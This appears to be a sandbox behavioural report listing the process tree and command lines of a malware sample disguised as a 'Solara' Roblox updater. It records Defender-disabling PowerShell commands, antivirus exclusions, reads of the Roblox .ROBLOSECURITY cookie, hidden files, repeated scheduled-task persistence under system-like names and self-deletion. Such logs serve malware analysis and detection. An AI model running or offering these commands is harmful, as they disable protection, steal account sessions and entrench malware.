PID 1072 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 1072 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Windows\System32\Wbem\wmic.exe
PID 1072 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Windows\System32\Wbem\wmic.exe
PID 1072 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Windows\System32\Wbem\wmic.exe
PID 1072 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 1072 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2388 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2388 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2388 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 1936 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 1936 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 3340 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3340 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 1936 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 3340 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 3340 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 3340 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 3340 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 3340 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 3340 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 3340 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3340 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3340 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 3340 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 5116 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 5116 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 5116 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 5116 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4232,i,13879737908471496610,15335851594401413307,262144 --variations-seed-version --mojo-platform-channel-handle=4084 /prefetch:8

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\dllhost.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\14t0asow\14t0asow.cmdline"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6DB9.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC421E32B0FE4E49CA8B405B3551F9DCDF.TMP"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ighgjthm\ighgjthm.cmdline"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6E94.tmp" "c:\Windows\System32\CSC174D5A98CE104C60BF24872A9DF0C71.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Google\csrss.exe'" /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Google\csrss.exe'" /rl HIGHEST /f

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "LoaderL" /sc MINUTE /mo 5 /tr "'C:\Windows\Registration\CRMLog\Loader.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Loader" /sc ONLOGON /tr "'C:\Windows\Registration\CRMLog\Loader.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "LoaderL" /sc MINUTE /mo 8 /tr "'C:\Windows\Registration\CRMLog\Loader.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 11 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 12 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Ch2d9wbArz.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Recovery\WindowsRE\RuntimeBroker.exe

"C:\Recovery\WindowsRE\RuntimeBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

